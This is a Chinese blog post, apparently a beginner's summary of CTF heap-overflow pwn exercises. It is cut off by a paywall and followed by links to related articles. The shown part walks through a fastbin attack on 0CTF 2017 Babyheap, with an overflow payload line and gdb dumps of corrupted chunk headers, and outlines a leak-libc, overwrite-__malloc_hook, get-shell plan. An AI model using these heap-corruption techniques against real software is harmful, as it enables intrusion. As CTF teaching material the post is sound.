linux 堆溢出 pwn 指南,新手科普 | CTF PWN堆溢出总结

最新推荐文章于 2023-05-26 17:53:35 发布
VIP文章 最新推荐文章于 2023-05-26 17:53:35 发布
阅读量899 收藏 3
点赞数
文章标签: linux 堆溢出 pwn 指南

学习汇总

序言

自从加入RTIS交流群, 在7o8v师傅,gd大佬的帮助下,PWN学习之路进入加速度。下面是八周学习的总结,基本上是按照how2heap路线走的。由于八周内容全写,篇幅太长,这里只讲述每道PWN题所用到的一个知识点。

第一节(fastbin_dup_into_stack)

知识点

利用fastbin之间,单链表的连接的特性, 溢出修改下一个free chunk的地址, 造成任意地址写.

例子: 0CTF 2017 BabyheapFill功能可以填充任意长字节, 漏洞在此.

leak memory: libc address

modify __malloc_hook内容为one_gadget

getshell

重点: fastbin attack

First Stepalloc(0x60)

alloc(0x40)

0x56144ab7e000: 0x0000000000000000 0x0000000000000071 --> chunk0 header

0x56144ab7e010: 0x0000000000000000 0x0000000000000000

0x56144ab7e020: 0x0000000000000000 0x0000000000000000

0x56144ab7e030: 0x0000000000000000 0x0000000000000000

0x56144ab7e040: 0x0000000000000000 0x0000000000000000

0x56144ab7e050: 0x0000000000000000 0x0000000000000000

0x56144ab7e060: 0x0000000000000000 0x0000000000000000

0x56144ab7e070: 0x0000000000000000 0x0000000000000051 --> chunk1 header

0x56144ab7e080: 0x0000000000000000 0x0000000000000000

0x56144ab7e090: 0x0000000000000000 0x0000000000000000

Second StepFill(0x10, 0x60 + 0x10, "A" * 0x60 + p64(0) + p64(0x71)) --> 开始破坏chunk1 header

0x56144ab7e000: 0x0000000000000000 0x0000000000000071

0x56144ab7e010: 0x6161616161616161 0x6161616161616161

0x56144ab7e020: 0x6161616161616161 0x6161616161616161

0x56144ab7e030: 0x6161616161616161 0x6161616161616161

0x56144ab7e040: 0x6161616161616161 0x6161616161616161

0x56144ab7e050: 0x6161616161616161 0x6161616161616161

0x56144ab7e060: 0x6161616161616161 0x6161616161616161

0x56144ab7e070: 0x0000000000000000 0x0000000000000071 --> 已修改为0x71

0x56144ab7e080: 0x0000000000000000 0x0000000000000000

Third Step: 申请small chunk0x56144ab7e060: 0x6161616161616161 0x6161616161616161

0x56144ab7e070: 0x0000000000000000 0x0000000000000071

0x56144ab7e080: 0x0000000000000000 0x0000000000000000

0x56144ab7e090: 0x0000000000000000 0x0000000000000000

0x56144ab7e0a0: 0x0000000000000000 0x0000000000000000

0x56144ab7e0b0: 0x0000000000000000 0x0000000000000000

0x56144ab7e0c0: 0x0000000000000000 0x0000000000000111 --> chunk2 header

Fouth Step: 破坏chunk2 header, 最后目的是释放chunk2Fill(2,

最低0.47元/天 解锁文章
思考的葡萄
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pwn利用的一些姿势 -- IO_FILE
lifanxin的博客
05-11 5052
IO_FILE概述IO_FILE结构介绍利用IO_FILE进行leakFSOP总结 概述   这是pwn利用系列的第三篇文章,本篇文章主要讲解一下IO_FILE结构在pwn题中的利用。一般来说,想到使用IO_FILE结构,是因为pwn题中没有可以用来leak的函数。 IO_FILE结构介绍   FILE 在 Linux 系统的标准 IO 库中是用于描述文件的结构,称为文件流。 FILE 结构在程序执行 fopen 等函数时会进行创建,并分配在中,然后以链表的形式串联起来,但系统一开始创建的三个文件st
溢出 Off-By-One 原理学习
prettyX的博客
04-11 2157
Off-By-One 严格来说,off-by-one是一种特殊的溢出漏洞,off-by-one指程序向缓冲区中写入时,写入的字节数超过了这个缓冲区本身所申请的字节数并且只越界了一个字节。 off-by-one,是指单字节缓冲区溢出,这种漏洞的产生往往与边界验证不严和字符串操作有关,也不排除写入的size正好就只多了一个字节的情况。 一般认为,单字节溢出是难以利用的,但是因为Linux管理机制ptmalloc验证的松散性,基于Linux的off-by-one漏洞利用起来并不复杂,并且威力强大...
pwn学习总结(八)—— (持续更新)
01-07
pwn学习总结(八)—— (持续更新)前言chunk使用中(分配后)空闲中(释放后)块大小空间复用binsfastbin利用思路unsorted binsmall bin 前言 学习自《glibc内存管理ptmalloc源代码分析》庄明强 著 部分资料参考自互联网 chunk 描述: 当用户通过malloc等函数申请空间时,实际上是从中分配内存 目前 Linux 标准发行版中使用的是 glibc 中的分配器:ptmalloc2 ptmalloc根据用户的需要,为用户分配不同类型的chunk 结构体: struct malloc_chunk { INTERNAL_SIZE_T p
Pwn 溢出(first_fit篇)
qq_51700257的博客
03-27 346
Pwn how2heap(first_fit篇) 我们先看看first_fit滴代码嗷 我们尝试运行该程序qwq,会出现神奇的情况 哎嘿,我们会发现第三个和第一个的地址一毛一样,这是为什么呢? 这段代码实际上展示的是分配的策略 在分配内存时,malloc会先到fastbin(或者unsorted bin)中查找合适大小的已经被free的chunk,如果没有,就会把unsorted bin中的所有chunk分配到所属于的bins中,然后再去这些bins中寻找合适的chunk。当你使用malloc分配
pwn】学pwn日记(结构学习)(随缘更新)
woodwhale的博客
08-20 4520
pwn】学pwn日记(结构学习) 1、什么是是下图中绿色的部分,而它上面的橙色部分则是管理器 我们都知道栈的从高内存向低内存扩展的,而是相反的,它是由低内存向高内存扩展的 管理器的作用,充当一个中间人的作用。管理从操作系统中申请来的物理内存,如果有用户需要,就提供给他。 2、了解管理器 注意:linux使用glibc 这里有两种申请内存的系统调用: brk mmap 第一种brk,是将heap下方的data段(bss属于data段),向上扩展申请的内存。 第二种mmap,其实下
pwn 学习笔记 格式化串计算偏移量
SsMing的博客
08-15 4807
学习参照:https://ctf-wiki.github.io/ctf-wiki/pwn/fmtstr/fmtstr_exploit/ 利用%s泄露libc函数的got表内容 addr%k$s可以用来泄露指定地址的内容,但要先确定k的值,可控制的格式化字符串参数是函数第几个参数(k+1),减一就是格式化字符串的第几个参数(k)。 利用  [tag]%p%p%p%p%p%p%p%p%p%p来确...
pwn学习】溢出(一)
Morphy_Amo的博客
01-05 4437
pwn溢出的学习
linux笔记(二)——相关的数据操作
segogt的博客
01-20 5719
溢出 概述 溢出指的是程序向某个块中写入字节数超过了块本身可用字节,因而导致了数据溢出,并覆盖到物理相邻的高地址的下一个块。 发生情况 程序向上写入数据。 写入的数据大小没有被良好地控制。 一般的利用思路 覆盖与其物理相邻的下一个 chunk 的内容。 prev_size size,主要有三个比特位,以及该块真正的大小。 NON_MAIN_ARENA IS_MAPPED P...
pwn学习总结(五) —— 溢出经典题型整理
qq_41988448的博客
12-29 1902
pwn学习总结(九) —— 经典题目整理三(持续更新)fastbin + 栈溢出fastbin + 函数构造 fastbin + 栈溢出 题目:fastbin 环境:ubuntu 16.04 下载地址:https://pan.baidu.com/s/1R6-BVR91Io_ZVPDDpBcCkA 提取码:r7e5 查看程序防护: 使用ida进行反编译: 已知条件: 可以得到mai...
linux c内存分配内存,Linux下关于C&C++的内存分配
weixin_28835583的博客
04-30 449
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?最近在项目中碰到C和C++中内存分配导致进程出现错误的问题,对Linux内存管理一直想好好研究一下,看过一些简单的介绍。但一直不太明白,先从C语言的内存的管理和分配开始看吧,记录一下中间学到的东西。中间看到过一片Hack the Virtual Memory: malloc, the heap & the pro...
CTF PWN 武器库题
12-12
CTF PWN 武器库题或rifle题,利用fastbin溢出得shell,
Linux pwn入门教程(1)——栈溢出基础-0x01.rar
06-10
Linux pwn入门教程(1)——栈溢出基础
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
pwn溢出10道练习题有writeup
01-04
pwn溢出练习题目,每题都有writeup.
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_debug sudo ...
ctf-pwn-—IO_FILE
xy_369的博客
05-26 275
ctf-pwn-—文件IO 教程
CTF资料-0x0002】PWN简易Linux利用入门教程by arttnba3
arttnba3的博客
02-25 2138
CTF资料-0x0002】简易Linux利用入门教程by arttnba3老生常谈,[GITHUB BLOG ADDR](https://archive.next.arttnba3.cn/2021/02/24/%E3%80%90CTF%E8%B5%84%E6%96%99-0x0002%E3%80%91%E7%AE%80%E6%98%93Linux%E5%A0%86%E5%88%A9%E7%94%A8%E5%85%A5%E9%97%A8%E6%95%99%E7%A8%8Bby%20arttnba3/),请
pwn学习】溢出(二)- First Fit
Morphy_Amo的博客
01-09 840
glibc管理中的First Fit机制
pwn 基础
qq_41696518的博客
09-03 675
是用malloc函数申请使用的。假设我们通过void * ptr = malloc(0x10);系统会调用一些函数在内存中开辟一大片空间作为的分配使用空间。malloc函数再从这篇的分配使用空间中分配0x10大小的空间,将指向该空间的地址返回给ptr(余下的空间称之为topthunk)chunk:用户申请内存的单位,也是管理器管理内存的基本单位 malloc()返回的指针指向一个chunk的数据区域。
ctf竞赛权威指南pwn篇 pdf
最新发布
11-05
CTF竞赛权威指南Pwn篇》是一本关于CTF(Capture The Flag)竞赛中的Pwn(利用漏洞攻击代码)题目的权威指南CTF竞赛是一种网络安全竞赛形式,旨在通过解决各种安全相关的难题来锻炼和提高参赛者的技能。 Pwn篇是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值